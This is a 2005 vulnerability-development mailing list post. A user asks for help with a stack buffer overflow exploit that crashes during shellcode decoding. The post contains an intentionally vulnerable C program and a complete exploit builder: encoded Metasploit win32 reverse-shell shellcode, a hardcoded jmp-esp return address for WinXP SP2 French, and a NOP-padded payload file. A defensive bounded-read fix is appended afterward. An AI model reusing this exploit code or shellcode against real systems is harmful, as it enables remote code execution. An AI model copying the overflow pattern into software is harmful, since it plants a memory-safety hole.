Vulnerability Development mailing list archives

problem to exploit a stack overflow


From: migalo digalo <l.epsilon () gmail com>
Date: Sun, 22 May 2005 18:20:35 +0000

hi all,

first post  :-D

ok, ok, I am trying to exploit an example of a stack-overflow-vulnerable prog:

[code]
#include <stdlib.h>
#include <stdio.h>

int bof()
{
    char buffer[8];
    FILE *badfile = NULL;

    badfile = fopen("badfile", "r");
    if (badfile)
        printf("[+]file open\n");

    fread(buffer, sizeof(char), 1024, badfile); // danger: up to 1024 bytes into an 8-byte buffer

    return 1;
}

int main(int argc, char **argv)
{
    bof();

    printf("[-] nop nop!\n");
    return 1;
}
[/code]

so if I am right, to exploit this we have the following stack:
<NOPS><EBP><EIP><ESP>

EBP==buffer[8]
EIP==buffer[12]
ESP==buffer[16]

so I coded this:

[code]
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <process.h>

#define RET_ADDRESS 0x7C951EED // The new return address for WinXP sp2 french == jump esp

/* win32_reverse -  EXITFUNC=seh LHOST=127.0.0.1 LPORT=4321 Size=312
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12"
"\xd4\x56\x85\x83\xeb\xfc\xe2\xf4\xee\xbe\xbd\xc8\xfa\x2d\xa9\x7a"
"\xed\xb4\xdd\xe9\x36\xf0\xdd\xc0\x2e\x5f\x2a\x80\x6a\xd5\xb9\x0e"
"\x5d\xcc\xdd\xda\x32\xd5\xbd\xcc\x99\xe0\xdd\x84\xfc\xe5\x96\x1c"
"\xbe\x50\x96\xf1\x15\x15\x9c\x88\x13\x16\xbd\x71\x29\x80\x72\xad"
"\x67\x31\xdd\xda\x36\xd5\xbd\xe3\x99\xd8\x1d\x0e\x4d\xc8\x57\x6e"
"\x11\xf8\xdd\x0c\x7e\xf0\x4a\xe4\xd1\xe5\x8d\xe1\x99\x97\x66\x0e"
"\x52\xd8\xdd\xf5\x0e\x79\xdd\xc5\x1a\x8a\x3e\x0b\x5c\xda\xba\xd5"
"\xed\x02\x30\xd6\x74\xbc\x65\xb7\x7a\xa3\x25\xb7\x4d\x80\xa9\x55"
"\x7a\x1f\xbb\x79\x29\x84\xa9\x53\x4d\x5d\xb3\xe3\x93\x39\x5e\x87"
"\x47\xbe\x54\x7a\xc2\xbc\x8f\x8c\xe7\x79\x01\x7a\xc4\x87\x05\xd6"
"\x41\x87\x15\xd6\x51\x87\xa9\x55\x74\xbc\x45\x0d\x74\x87\xdf\x64"
"\x87\xbc\xf2\x9f\x62\x13\x01\x7a\xc4\xbe\x46\xd4\x47\x2b\x86\xed"
"\xb6\x79\x78\x6c\x45\x2b\x80\xd6\x47\x2b\x86\xed\xf7\x9d\xd0\xcc"
"\x45\x2b\x80\xd5\x46\x80\x03\x7a\xc2\x47\x3e\x62\x6b\x12\x2f\xd2"
"\xed\x02\x03\x7a\xc2\xb2\x3c\xe1\x74\xbc\x35\xe8\x9b\x31\x3c\xd5"
"\x4b\xfd\x9a\x0c\xf5\xbe\x12\x0c\xf0\xe5\x96\x76\xb8\x2a\x14\xa8"
"\xec\x96\x7a\x16\x9f\xae\x6e\x2e\xb9\x7f\x3e\xf7\xec\x67\x40\x7a"
"\x67\x90\xa9\x53\x49\x83\x04\xd4\x43\x85\x3c\x84\x43\x85\x03\xd4"
"\xed\x04\x3e\x28\xcb\xd1\x98\xd6\xed\x02\x3c\x7a\xed\xe3\xa9\x55"
"\x99\x83\xaa\x06\xd6\xb0\xa9\x53\x40\x2b\x86\xed\xe2\x5e\x52\xda"
"\x41\x2b\x80\x7a\xc2\xd4\x56\x85";

int main(int argc, char *argv[])
{
    char buf[1024];
    FILE *badfile;

    memset(buf, 0x90, 1024);                       // fill with NOPs

    *(unsigned long *)&buf[12] = RET_ADDRESS;      // EIP = Return Address
    memcpy(&buf[16], shellcode, sizeof(shellcode) - 1);

    badfile = fopen("badfile", "wb");
    fwrite(buf, 1020, 1, badfile);
    fclose(badfile);
    return 0;
}
[/code]

but it doesn't work :-( :no, any help? I am stuck with this for 8 hrs.

in fact it works till the execution of the shellcode, precisely the
decode stage, so we get
[+] eip <= RET_ADDRESS
[+] jump esp
[+] begin the shellcode execution
[-] access violation, in the decode stage :-x

and what is worse is that I get the same prob with all the shellcodes I
used (all from metasploit). I am certain there is something I missed,
cuz I have already used those shellcodes and they work perfectly.
any help?
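As an added example (not code from the poster), here is the defender's fix for the defect the post's bof() demonstrates: fread() is given a length derived from the destination buffer, the fopen() result is checked before use, and the byte count fread() returns is used instead of assumed. The names read_bounded, write_fill and the file name badfile_demo are mine, not from the post.

```c
#include <stdio.h>

#define BUF_SIZE 8   /* same destination size as buffer[8] in the post */

/* Hardened counterpart of the post's bof(): read at most cap-1 bytes of
 * path into out and NUL-terminate. Returns bytes stored, or -1 if cap is 0
 * or the file cannot be opened (the original fread()s from a NULL FILE*). */
long read_bounded(const char *path, char *out, size_t cap)
{
    FILE *f;
    size_t n;
    if (cap == 0)
        return -1;
    f = fopen(path, "rb");
    if (!f)
        return -1;
    /* The length passed to fread() comes from the destination, so the
     * original's 1024-byte request can no longer overrun an 8-byte buffer. */
    n = fread(out, 1, cap - 1, f);
    fclose(f);
    out[n] = '\0';
    return (long)n;
}

/* Demo helper (hypothetical name): write len copies of fill to path. */
int write_fill(const char *path, unsigned char fill, size_t len)
{
    FILE *f = fopen(path, "wb");
    size_t i;
    if (!f)
        return 0;
    for (i = 0; i < len; i++)
        fputc(fill, f);
    fclose(f);
    return 1;
}

int main(void)
{
    char buffer[BUF_SIZE];
    long n;
    /* Constructed input: a 1024-byte file, the size the original fread asks for. */
    if (!write_fill("badfile_demo", 0x41, 1024))
        return 1;
    n = read_bounded("badfile_demo", buffer, sizeof buffer);
    printf("stored %ld of 1024 bytes, buffer not overrun\n", n);
    remove("badfile_demo");
    return 0;
}
```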
